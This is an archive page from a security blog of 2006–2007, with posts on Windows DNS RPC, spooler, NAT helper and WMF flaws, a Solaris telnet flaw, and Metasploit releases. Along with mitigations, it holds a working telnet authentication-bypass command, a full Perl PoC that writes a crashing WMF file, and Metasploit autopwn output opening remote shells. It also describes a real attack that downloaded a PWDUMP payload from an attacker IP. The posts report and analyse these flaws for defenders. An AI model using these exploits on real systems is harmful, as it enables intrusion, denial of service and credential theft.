04.15.07
Posted in Exploits, IT, Security, Vulnerabilities at 4:49 pm by Tyler Reguly
It's amazing how quickly the community can respond... In the past 24 hours I've seen exploits from three sources for this vulnerability. We've got an exploit for metasploit, an exploit written in python and one written in C. (I considered whether or not I'd link to these but since they're all publicly available... I might as well). Here are a couple images of the exploit.
Exploit executed in Metasploit:
Looking at the process on the vulnerable box:
So here's the information we've got from all the various sources:
- The vulnerable function is: extractQuotedChar()
- This function is reached via:
- Interface: 50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0
- Operation: DnssrvQuery
- OpCode: 0x01
- The attack can be performed anonymously against the listening RPC Interface (a TCP port between 1024 and 5000).
- The attack can also be performed with credentials against port 445.
- Original Attacks: April 4th and 5th against two US Universities
- Original Attack Details (Source):
- Shellcode binds to TCP port 1100.
- Attacker uploads a VBscript on this port and then runs it.
- VBscript downloads an executable DUP.EXE (MD5: a5ae220fec052a1f2cd22b4eb89a442e) from 203.66.151.92/images/.
- Executable is self-extracting and contains PWDUMP v5 and an associated DLL.
- Microsoft Advisory (Including mitigation information)
- Mitigation: How to script the mitigation technique across an entire domain.
Now I guess the question remains, "Will we see an Out-of-Band Update to fix this issue?"
It's an interesting question because the views are so varied on the seriousness of this issue. An example of this debate is this thread on the dns-operations mailing list.
So it's fair to assume that this won't be a HUGE issue... as others have said this won't be Slammer or Code Red. That doesn't mean this isn't a serious issue. I also question the flawed logic I've seen, on various discussion boards, mailing lists and even in conversations with friends, on who this will affect and why this would "only affect idiots".
I think the people making these assumptions are from corporate environments and the actual IS industry... They're forgetting about small and medium businesses. I think this has much more serious consequences in the SMB environment. Let's think about the number of SMBs out there... how many of these businesses have purchased SBS Server and popped it into their network. SBS is a security nightmare... all of your services on your domain controller, including Exchange, and them telling the user to place it live on the internet. I've walked into environments where the SBS is plugged into a Linksys router and that router is plugged into the internet connection. One might think, "Well the router will filter the affected ports"... right and wrong. The environments I've seen have been too lazy (or lacked the knowledge) to properly configure the router and setup forwarded ports for things like Exchange. Instead they've simply put the SBS on the DMZ, opening it up to the world... and to vulnerabilities such as this one.
So I am concerned by this... should someone decide to create a worm, that's a large number of zombied computers that they could have... A growing botnet based on insecure SMBs. It may not be an extraordinary number of computers but it would be substantial. I'd wager a guess that given a) the number of businesses that have slapped a setup together and b) the number of businesses that have relied on "on-site computer service professionals" that there are a large number of vulnerable computers sitting and waiting to be exploited.
Do I think this will ever be turned into a worm? Nope. Do I think this is serious and dangerous? You bet. I guess only time will tell.
Permalink
Digg this post
04.11.07
Posted in Exploits, IT, Security, Vulnerabilities at 5:58 pm by Tyler Reguly
Yet again we see it happening... Patch Tuesday rolls around and suddenly we're hit by more "0-days" for Microsoft products. This time it's primarily Office, but a heap-overflow in .HLP files was also released. McAfee AVERT Labs have been doing some research into the vulnerabilities, however they haven't had much to say yet. Initially they only addressed the Office flaws but came back later to include the .HLP heap-overflow. These 4 PoCs (2 DoS and 2 overflows) were released to the Full Disclosure mailing list by muts (of BackTrack fame). This was also discussed over at heise Security. They have mentioned that there's no proof yet that these are new vulnerabilities, they may actually be related to the vulnerabilities announced by eEye.
I guess only time will tell but this could mean an increase to the number of items on the 'Missing Microsoft Patches' list.
Permalink
Digg this post
03.27.07
Posted in Exploits, IT, Security, Tools at 3:05 pm by Tyler Reguly
From the Metasploit Homepage:
March 27th, 2007 -- Metasploit is pleased to announce the immediate,
free availability of the Metasploit Framework version 3.0 from
http://framework.metasploit.com/.
The Metasploit Framework ("Metasploit") is a development platform for
creating security tools and exploits. Version 3.0 contains 177
exploits, 104 payloads, 17 encoders, and 3 nop modules. Additionally,
30 auxiliary modules are included that perform a wide range of tasks,
including host discovery, protocol fuzzing, and denial of service testing.
The full Release Notes can be found via the download page, which also contains download links for both a tarball and a Windows executable.
Permalink
Digg this post
03.11.07
Posted in Exploits, IT, Security at 1:14 am by Tyler Reguly
A Proof of Concept memory corruption has been released on milw0rm. This is coming from the author of the Internet Connection Sharing DoS. I'm wondering if we'll see an excess of MS exploits this month given their decision not to patch any of the existing flaws.
Permalink
Digg this post
02.11.07
Posted in Exploits, IT, Security, Vulnerabilities at 3:24 am by Tyler Reguly
We've all heard it before... Don't run telnet because it's a plain text protocol, it's an inherent security risk... Which is true, SSH just makes more sense and plenty of people are using SSH these days. This doesn't mean that everyone is though, so... *ATTENTION SOLARIS ADMINS** If you're still running telnet on Solaris 10 or 11 (SunOS 5.10 or 5.11)... Turn it off. An email was released on Full Disclosure earlier with a new 0-day for Solaris 10/11 that's so easy it makes my skin crawl. This pdf was linked in the email which gives details and a small shell script to perform the exploit. It seemed surprising that this existed and had not been previously found, so of course I had to try it out.
C:\Documents and Settings\treguly>telnet -l "-fbin" X.X.X.X
Last login: Sun Feb 11 00:24:44 from XXXX
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$
The result is more than a little frightening...
A Hat Tip for this goes to Maynor and the Errata Security Blog for informing me of this issue.
[UPDATE] While it was initially rumoured that this didn't affect the root account, this is not the case... root logins are possible... it is dependent on configuration. More info on the nCircle Blog.
Permalink
Digg this post
12.03.06
Posted in Exploits, IT, Security, Vulnerabilities at 10:52 pm by Tyler Reguly
Let's call this attempt #2. I attempted to blog on this subject earlier this evening but when I published the post, only half of it was there... I've learned to either save frequently... or use an outside text editor to compose my posts.
Anyways, a couple of blogs have been mentioning a new 0-day DoS which is available on milw0rm. FrSIRT has released an advisory on the subject. I spent some time earlier today looking into the exploit...
This is included in the comments of the exploit (which is written in python):
# Tested on Windows 2000 SP4 Polish + All Microsoft Security Bulletins
# Example:
#
# C:\>python spoolss_dos.py 192.168.0.2 512
#
# [*] MS Windows GetPrinterData() 0day Memory Allocation Remote DoS Exploit
# [*] Coded by h07
# [*] Connecting to 192.168.0.2:445
# [+] Connected
# [+] The NETBIOS connection with the remote host timed out.
# [+] 192.168.0.2: Out of memory
# [+] Done
#
# Exploit --> GetPrinterData(handle, value, 1024 * 1024 * 512) --> MS_Windows
# Spooler service(spoolsv.exe) memory usage: 512 MB
I tested the exploit against Windows XP SP2. Both machines that I tested it against returned the message "Return code: Access denied (0x00000005)". This same message was also received when attempting the exploit on a Windows XP SP1 machine.
I moved my testing on to 2K. In the end I ran the exploit about 10 times, using values from 128 to 1024. Every time I ran the DoS the amount of memory in use would increase. If I attempted a value higher than the remaining available memory, I would receive a "Memory Allocation Error". When I reached the end of the available memory, my virtual memory would grow until it finally hit the maximum allowed virtual memory. At this point I received an error message on the system informing me that my Virtual Memory Minimum was too low. I ran the exploit a couple more times after this happened (using 256 as my value) and eventually the UI became unresponsive. I could very slowly move the mouse, however the taskbar clock wasn't updating with the time, and I couldn't click on anything. I was essentially forced to reboot the system. Upon reboot, there was no indication of what had caused the problem, or that there had been a problem.
It is important to remember that this DoS requires the Printer Spooler service to be enabled. For a previous Printer Spooler vulnerability, Microsoft offered the following advice:
Option 1: Disable the Print Spooler service
( HT's Note: This solution was suggested on Donna's Security Flash (as well as MS Advisory: MS05-043, I suggest option two which is below and was also included in MS05-043 )
Disabling the Print Spooler service will help protect the affected system from attempts to exploit this vulnerability. To disable the Print Spooler service, follow these steps:
1. Click Start, and then click Control Panel. Alternatively, point to Settings, and then click Control Panel.
2. Double-click Administrative Tools.
3. Double-click Services.
4. Double-click Print Spooler.
5. In the Startup type list, click Disabled.
6. Click Stop, and then click OK.
You can also stop and disable the Print Spooler service by using the following command at the command prompt:
sc stop Spooler & sc config Spooler start= disabled
Impact of Workaround: If you disable the Print Spooler service, you cannot print locally or remotely. Therefore, we recommend this workaround only on systems that do not require printing.
------
Option 2: Remove Printer Spooler Service from NullSessionPipes.
On Windows 2000 Server Service Pack 4 remove the Print Spooler service from the NullSessionPipes registry key:
1. Click Start, click Run, type "regedt32" (without the quotation marks), and then click OK.
2. In Registry Editor, locate the following registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\NullSessionPipes
3.Edit the registry key and remove the SPOOLSS value.
4. Restart the affected system after performing these actions.
Impact of Workaround: Anonymous connections to the Print Spooler service will not be allowed. This is the default behavior of later operating system versions.
It is also important to note that based on the output we see in the exploit, that it would appear as thought access to port 445 is required. Firewalling this port should prevent remote DoS attempts.
Peace,
HT
Permalink
Digg this post
10.29.06
Posted in Exploits, IT, Security, Vulnerabilities at 3:34 am by Tyler Reguly
A new MS exploit showed up on milw0rm yesterday -- http://www.milw0rm.com/exploits/2672 (Code is written in Python and quite easy to follow)...
Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
The exploit requires Internet Connection Sharing to be enabled and requires that the attacker be on the shared interface (from what I've seen in my playing thus far).
Malicious Person --- Computer with ICS --- Internet
I ran Windows Updates on an XP SP2 machine immediately prior to testing this... so it *SHOULD* have been fully up-to-date
I've attached a few of the details below.
Peace,
HT
------
Microsoft Error Message:
Generic Host Process for Win32 Services has encountered a problem and needs to close. We are sorry for the inconvenience.
View What's in this report:
Error signature:
szAppName: svchost.exe szAppVer: 5.1.2600.2180
szModName: ipnathlp.dll szModVer 5.1.2600.2180 offset: 0001d45e
mdmp file created during crash loaded into WinDbg
Microsoft (R) Windows Debugger Version 6.6.0007.5
Copyright (c) Microsoft Corporation. All rights reserved.
This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(570.5ec): Access violation - code c0000005 (first/second chance not available)
0:077> .ecxr
eax=00000000 ebx=0018aef8 ecx=00000001 edx=0000022d esi=0018af44 edi=00800002
eip=6647d45e esp=0207fed0 ebp=0207ff30 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ipnathlp!DnsProcessQueryMessage+0xe8:
6647d45e 8a10 mov dl,byte ptr [eax] ds:0023:00000000=??
Permalink
Digg this post
Digg this story ?
09.22.06
Posted in Exploits, IT, Security, Vulnerabilities at 10:00 pm by Tyler Reguly
So the guys over at ZERT have released, what I believe is, their first patch since forming. The group... the Zeroday Emergency Response Team has out a patch for the IE VML 0Day (MS Advisory | Press | Source Code) that has been circulating. If you are interested in it you can download it from their website.
This has me thinking a lot about patch management and I'm going to put some thought into it tomorrow and publish it tomorrow night or Sunday morning.
Peace,
HT
Permalink
Digg this post
09.17.06
Posted in Exploits, IT, Security at 11:38 pm by Tyler Reguly
H.D. Moore has released a great article on performing automated exploitation using Metasploit 3.0. To obtain the latest MSF 3.0 source code you require svn... To perform the actual exploitation you'll require Ruby, PostgreSQL and RubyGems. The article provides a great explaination of setting everything up and running the automated exploitation.. There's also console output to show you exactly what you type and what happens.. It's definately worth the read and once I play with it a bit, I'll be throwing my comments and results up here for everyone to read.
Peace,
HT
-----
Console Output:
-----
$ ./msfconsole
=[ msf v3.0-beta-2-svn
+ -- --=[ 102 exploits - 93 payloads
+ -- --=[ 17 encoders - 4 nops
=[ 13 aux
msf > load db_postgres
[*] Successfully loaded plugin: db_postgres
msf > db_create
dropdb: database removal failed: ERROR: database "metasploit3" does not exist
CREATE DATABASE
ERROR: table "hosts" does not exist
[ snip ]
msf > db_nmap -p 445 192.168.0.0/24
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-09-17 22:49 CDT
Interesting ports on destructo (192.168.0.2):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WIN2000DB.lan (192.168.0.106):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WINXPSP0.lan (192.168.0.108):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WIN2000SP4.lan (192.168.0.139):
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap finished: 256 IP addresses (8 hosts up) scanned in 12.493 seconds
msf > db_services
[*] Service: host=192.168.0.2 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.106 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.108 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.139 port=445 proto=tcp state=up name=microsoft-ds
msf > db_autopwn -p -t -e
[*] Analysis completed in 0.208992004394531 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.0.106:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.108:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.2:445...
[ snip ]
[*] Calling the vulnerable function...
[*] Calling the vulnerable function...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Bound to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.0.139[\BROWSER] ...
[*] Building the stub data...
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 4 opened (192.168.0.145:60778 -> 192.168.0.139:26188)
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 5 opened (192.168.0.145:47380 -> 192.168.0.106:27700)
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.0.145:46858 -> 192.168.0.139:15441
2 Command shell 192.168.0.145:42700 -> 192.168.0.108:28199
3 Command shell 192.168.0.145:40966 -> 192.168.0.106:27915
4 Command shell 192.168.0.145:60778 -> 192.168.0.139:26188
5 Command shell 192.168.0.145:47380 -> 192.168.0.106:27700
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Permalink
Digg this post
08.06.06
Posted in Exploits, IT, Security, Vulnerabilities at 10:07 pm by Tyler Reguly
First off... you'll noticed I put exploit in quotes... I haven't investigated this yet.... That's my plan for this evening... It's a crash which means a DoS.... whether you consider that an exploit or not is up to you...
Here's the original posting from FD
| quote: |
Posted by: cyanid-E
Description:
yet another 'windows meta file' (WMF) denial of service exploit.
System affected:
+ Windows XP SP2,
+ Windows 2003 SP1,
+ Windows XP SP1,
+ Windows XP
+ Windows 2003
Tech info:
page fault in gdi32!CreateBrushIndirect() because invalid pointer access.
Incorrect (short) to (void*) sign extension also present.
Exploit:
=== begin of brush.pl ===
#!/usr/bin/perl
print "\nWMF PoC denial of service exploit by cyanid-E ";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF " \x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x
61\x6E\x69\x64";
print WMF " \x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x
00\x00\x00\x00";
print WMF " \x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00";
print WMF " \x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x
00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait  \n";
=== end of brush.pl ===
Just run brush.pl and try to preview brush.wmf (or even browse folder
with brush.wmf in windows explorer).
Discovered:
06/24/2006; vendor informed but not answered |
Further information from FD:
| quote: |
| 1. 'Bad' wmf record:
07 00 00 00
length of record (in words)
FC 02
type (CreateBrushIndirect)
08 00 00 00 00 00 00 80
'packed' (good old Win16 days) LOGBRUSH data:
08 00 - 'packed' lpStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])
00 00 00 00 - COLORREF (any)
00 80 - 'packed' lbHatch (any, signed)
2. Sign extension bug:
_CommonEnumMetaFile:
......
; normalize 'packed' LOGBRUSH
movzx eax, word ptr [ebx+6] ; lbStyle (UINT32(UINT16))
mov [ebp-0f8], eax
mov eax, [ebx + 8] ; COLORREF (as is)
mov [ebp-0f4], eax
movsx eax, word ptr [ebx+0c] ; < -- BUGBUG: lbHatch (UINT32(INT16))
lea eax, [ebp-0f8]
push eax
call _CreateBrushIndirect
......
3. Memory access to fake 'pointer to packed DIB' (lbHatch) bug:
cmp edi, 6 ; BS_DIBPATTERNPT == lbStyle
jz _go2crush
......
cmp edi, 8 ; BS_DIBPATTERN8X8 == lbStyle
jz _go2crush
......
_go2crush:
push esi
push 1
push eax, [ebp+10]
push eax
push dword ptr [ebp+0c] ; 1
push dword ptr [ebp+18] ; lpHatch (fake *packedDIB)
call _pbmiConvertInfo
......
......
_pbmiConvertInfo:
......
push ebx
mov ebx, [ebp+8] ; lpHatch (fake *packedDIB)
......
mov eax, [ebx] ; < -- BUGBUG: crush or random (in first 0x7f00 bytes)
; memory access (see @ 0x3000 region)
|
I'll keep people informed as I play with it...
Peace,
HT
Permalink
Digg this post
Digg this story ?
« Previous entries
